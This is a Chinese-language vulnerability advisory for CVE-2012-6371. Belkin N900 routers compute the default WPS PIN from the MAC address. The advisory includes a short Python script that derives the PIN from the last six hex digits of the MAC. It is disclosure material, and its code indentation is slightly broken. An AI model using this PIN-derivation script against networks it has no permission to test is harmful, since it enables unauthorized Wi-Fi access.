Belkin Wireless Router默认WPS PIN安全漏洞

发布日期:2013-01-03
更新日期:2013-01-06

受影响系统:
Belkin Wireless Router Belkin N900 F9K1104v1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57128
 CVE(CAN) ID: CVE-2012-6371
 
Belkin Wireless Routers是美国贝尔金公司的无线路由器产品。
 
Belkin N900 F9K1104v1及其他版本在WPA2的实现上,用基于6位数字的LAN/WLAN MAC地址建立了WPS PIN,通过读取广播报文,远程攻击者可利用此漏洞访问Wi-Fi网络。
 
<*来源:ZhaoChunsheng (e.novellalorente@student.ru.nl)
 
  链接:?p=1295
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
@author      : e.novellalorente@student.ru.nl
 Original work : ZhaoChunsheng 04/07/2012

'''

import sys

VERSION    = 0
 SUBVERSION = 2

def usage():
    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
    print "[*] Usage : python WPSpin.py 123456"
    sys.exit(0)

def wps_pin_checksum(pin):
    accum = 0

while(pin):
        accum += 3 * (pin % 10)
        pin /= 10
        accum += pin % 10
        pin /= 10
    return  (10 - accum % 10) % 10

try:
    if (len(sys.argv[1]) == 6):
        p = int(sys.argv[1] , 16) % 10000000
        print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
    else:
        usage()
 except Exception:
    usage()

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Belkin
 ------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygwyf.html